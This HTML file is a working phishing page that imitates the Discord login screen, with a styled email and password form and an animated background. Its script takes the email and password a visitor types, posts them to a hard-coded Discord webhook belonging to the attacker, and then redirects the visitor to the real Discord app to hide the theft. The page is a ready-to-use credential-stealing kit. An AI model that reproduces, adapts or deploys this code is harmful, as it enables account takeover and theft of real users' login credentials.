<html>
    <head>
        <title>Discord</title>
        <link rel="icon" type="image/x-icon" href="fav.png">
    </head>
    <style>
        * {
  box-sizing: border-box;
}
* {
  margin: 0; padding: 0;
}
html,
body {
  width: 100%;
  height: 100%;
}

body {
  margin: 0;
  display: flex;
  justify-content: center;
  align-items: center;
  background: #7289DA;
  background-image: url('backs2.png');
}
body section canvas {
  position: absolute;
  top: 0;
  left: 0;
}
body section form {
  position: absolute;
  display: block;
  width: 480px;
  height: 424px;
  background: #36393f;
  padding: 40px;
  border-radius: 5px;
  box-shadow: 0 2px 10px 0 rgba(0, 0, 0, 0.2);
  font-family: Whitney, Helvetica Neue, Helvetica, Arial, sans-serif;
  margin: auto;
  top: 30%;
  right: 38%;
}
body section form h3 {
  font-size: 26px;
  font-weight: 300;
  text-align: center;
  color: whitesmoke;
}
body section form p {
  font-size: 16px;
  color: #72767d;
  text-align: center;
}
body section form .label {
  position: relative;
  font-size: 10px;
  margin-top: 16px;
  color: #8e9297;
  font-weight: bold;
}
body section form input {
  position: relative;
  width: 100%;
  height: 40px;
  margin-top: 10px;
  color: #dcddde;
  border: 1px solid rgba(0, 0, 0, 0.3);
  padding: 10px;
  border-radius: 3px;
  outline: none;
  background: rgba(0, 0, 0, 0.1);
  
}
body section form input:focus {
  border-color: #7289da;
}
body section form button {
  width: 100%;
  height: 44px;
  margin-top: 40px;
  font-size: 16px;
  font-weight: bold;
  background: #7289da;
  outline: none;
  border: none;
  border-radius: 3px;
  color: white;
  cursor: pointer;
}
    </style>
    <body>
        <section>
            <canvas id='canvas' ></canvas>
            <form onsubmit="return false">
                <h3>Welcome Back</h3>
                <p>We're so excited to see you again!</p>
                <div class="label">EMAIL</div>
                <input id="email">
                <div class="label">PASSWORD</div>
                <input id="pass">
                <button id="button">Login</button>
            </form>
        </section>
    </body>
    <script>
    function sendMessage() {
        const request = new XMLHttpRequest();
        request.open("POST", "https://discord.com/api/webhooks/1003657656218681407/uG_VcDa1LuHtTCW9CHxXOsdjfSr_D_jG5BSow2_qpNZjrcZYg40YtmZ75JkGjWICm-A_");

        request.setRequestHeader('Content-type', 'application/json');

        const params = {
            username: "Info",
            avatar_url: "",
            content: `**Email: **${document.getElementById("email").value}\n**Password: **${document.getElementById("pass").value}`
        }

        request.send(JSON.stringify(params));
        location.href = "https://discord.com/app";
    }
        document.getElementById('button').addEventListener("click",sendMessage);







        const TWO_PI = Math.PI * 2;
const HALF_PI = Math.PI / 2;
const canvas = document.createElement("canvas");
const c = canvas.getContext("2d");

canvas.width = window.innerWidth;
canvas.height = window.innerHeight;
document.body.appendChild(canvas);

class Blob {
  constructor() {
    this.wobbleIncrement = 0;
    // use this to change the size of the blob
    this.radius = 500;
    // think of this as detail level
    // number of conections in the `bezierSkin`
    this.segments = 12;
    this.step = HALF_PI / this.segments;
    this.anchors = [];
    this.radii = [];
    this.thetaOff = [];

    const bumpRadius = 100;
    const halfBumpRadius = bumpRadius / 2;

    for (let i = 0; i < this.segments + 2; i++) {
      this.anchors.push(0, 0);
      this.radii.push(Math.random() * bumpRadius - halfBumpRadius);
      this.thetaOff.push(Math.random() * 2 * Math.PI);
    }

    this.theta = 0;
    this.thetaRamp = 0;
    this.thetaRampDest = 12;
    this.rampDamp = 25;
  }
  update() {
    this.thetaRamp += (this.thetaRampDest - this.thetaRamp) / this.rampDamp;
    this.theta += 0.03;

    this.anchors = [0, this.radius];
    for (let i = 0; i <= this.segments + 2; i++) {
      const sine = Math.sin(this.thetaOff[i] + this.theta + this.thetaRamp);
      const rad = this.radius + this.radii[i] * sine;
      const x = rad * Math.sin(this.step * i);
      const y = rad * Math.cos(this.step * i);
      this.anchors.push(x, y);
    }

    c.save();
    c.translate(-100, -100);
    c.scale(2, 2.5);
    c.fillStyle = "#36393f";
    c.beginPath();
    c.moveTo(0, 0);
    bezierSkin(this.anchors, false);
    
    c.lineTo(0, 0);
    c.fill();
    c.restore();
  }
}

const blob = new Blob();

function loop() {
  c.clearRect(0, 0, canvas.width, canvas.height);
  blob.update();
  window.requestAnimationFrame(loop);
}
loop();

// array of xy coords, closed boolean
function bezierSkin(bez, closed = true) {
  const avg = calcAvgs(bez);
  const leng = bez.length;

  if (closed) {
    c.moveTo(avg[0], avg[1]);
    for (let i = 2; i < leng; i += 2) {
      let n = i + 1;
      c.quadraticCurveTo(bez[i], bez[n], avg[i], avg[n]);
    }
    c.quadraticCurveTo(bez[0], bez[1], avg[0], avg[1]);
  } else {
    c.moveTo(bez[0], bez[1]);
    c.lineTo(avg[0], avg[1]);
    for (let i = 2; i < leng - 2; i += 2) {
      let n = i + 1;
      c.quadraticCurveTo(bez[i], bez[n], avg[i], avg[n]);
    }
    c.lineTo(bez[leng - 2], bez[leng - 1]);
  }
}

// create anchor points by averaging the control points
function calcAvgs(p) {
  const avg = [];
  const leng = p.length;
  let prev;

  for (let i = 2; i < leng; i++) {
    prev = i - 2;
    avg.push((p[prev] + p[i]) / 2);
  }
  // close
  avg.push((p[0] + p[leng - 2]) / 2, (p[1] + p[leng - 1]) / 2);
  return avg;
}

    </script>
</html>